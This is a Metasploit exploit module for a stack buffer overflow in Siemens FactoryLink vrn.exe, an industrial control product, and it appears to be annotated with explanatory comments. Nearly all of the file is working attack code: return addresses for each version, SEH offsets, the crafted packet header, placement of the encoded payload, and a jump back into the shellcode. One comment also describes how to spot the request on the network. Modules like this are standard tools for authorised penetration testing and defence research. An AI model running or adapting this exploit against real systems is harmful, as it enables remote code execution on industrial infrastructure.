##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Remote exploit module for the FactoryLink vrn.exe opcode 9 stack buffer
# overflow described in 'Description' below. The module is SEH-based: each
# entry in 'Targets' carries the per-version return address ('Ret') and the
# offset at which the SEH record is written ('Offset'); both are consumed by
# #exploit. Transport is a single TCP connection (RPORT, default 7579).
class MetasploitModule < Msf::Exploit::Remote
  Rank = AverageRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Remote::Seh

  # Registers module metadata (name, references, payload constraints, target
  # table) and the single module option RPORT, defaulting to 7579.
  #
  # @param info [Hash] base module info merged via update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Siemens FactoryLink vrn.exe Opcode 9 Buffer Overflow',
        'Description' => %q{
          This module exploits a stack buffer overflow in FactoryLink 7.5, 7.5 SP2,
          and 8.0.1.703. By sending a specially crafted packet, an attacker may be able to
          execute arbitrary code due to the improper use of a vsprintf() function while
          processing the user-supplied text field. Originally found and posted by
          Luigi Auriemma.
        },
        'Author' => [
          'Luigi Auriemma', # Public exploit
          'hal', # Metasploit module
          'MC', # SEH, badchars, etc
        ],
        'License' => MSF_LICENSE,
        'References' => [
          ['OSVDB', '72815'],
          ['URL', 'http://aluigi.altervista.org/adv/factorylink_4-adv.txt'],
          ['URL', 'https://www.cisa.gov/uscert/ics/advisories/ICSA-11-091-01']
        ],
        'Privileged' => true,
        'DefaultOptions' => {
          'EXITFUNC' => 'seh',
        },
        # Constraints applied to payload.encoded before it is copied into the
        # data buffer in #exploit. BadChars excludes NUL, space, LF and CR.
        'Payload' => {
          'Space' => 550,
          'BadChars' => "\x00\x20\x0a\x0d",
          'StackAdjustment' => -3500,
        },
        'Platform' => 'win',
        # 'Ret' is read through target.ret and 'Offset' through
        # target['Offset'] in #exploit; both are version-specific.
        'Targets' => [
          [ 'FactoryLink 7.5', { 'Ret' => 0x1c0106ac, 'Offset' => 994 } ],
          [ 'FactoryLink 7.5 SP2', { 'Ret' => 0x1c01069c, 'Offset' => 994 } ],
          [ 'FactoryLink 8.0.1.703', { 'Ret' => 0x1c01087c, 'Offset' => 998 } ],
        ],
        'DisclosureDate' => '2011-03-21',
        # Reliability, stability and side-effect traits have not been
        # assessed for this module.
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options([Opt::RPORT(7579)])
  end

  # Builds the fixed protocol header and a 65535-byte filler buffer, overwrites
  # fixed regions of the filler with the encoded payload, the SEH record and a
  # short relative call, sends header + data on one connection, then hands off
  # to the payload handler.
  #
  # Detection note: on the wire the request is the constant header below
  # (opcode bytes "\x09\x00") followed by roughly 64 KiB of uppercase ASCII
  # filler to the configured RPORT (default 7579); the only variable content
  # is the random filler and the payload region.
  def exploit
    # Fixed protocol header; 0x3f bytes act as filler between the fields.
    header = "\x3f" * 4
    header << "\xff\x55"
    header << "\x09\x00" # opcode
    header << "\x3f\x3f\xff\xff"
    header << "\x00\x00\x3f\x3f"
    header << "\x01\x00"
    header << "\x3f" * 16
    header << "\x01\x00\x01\x00"
    header << "\x3f\x3f"

    # Random uppercase-alpha filler; regions below are overwritten in place.
    data = rand_text_alpha_upper(65535)
    # Encoded payload at a fixed offset (bounded by 'Space' => 550).
    data[448, payload.encoded.length] = payload.encoded
    # SEH record (8 bytes) at the target-specific offset using the target's
    # return address.
    data[target['Offset'], 8] = generate_seh_record(target.ret)
    # 5-byte relative call assembled at runtime with Metasm; it is written at
    # a fixed offset after the SEH record.
    data[1006, 5] = Metasm::Shellcode.assemble(Metasm::Ia32.new, "call $-524").encode_string

    print_status("Trying target #{target.name}...")

    connect
    sock.put(header + data)

    # Start the payload handler after the request has been written.
    handler

    # Kernel#select with no IO sets and a 1-second timeout acts as a sleep,
    # giving the service a moment before the socket is closed.
    select(nil, nil, nil, 1)
    disconnect
  end
end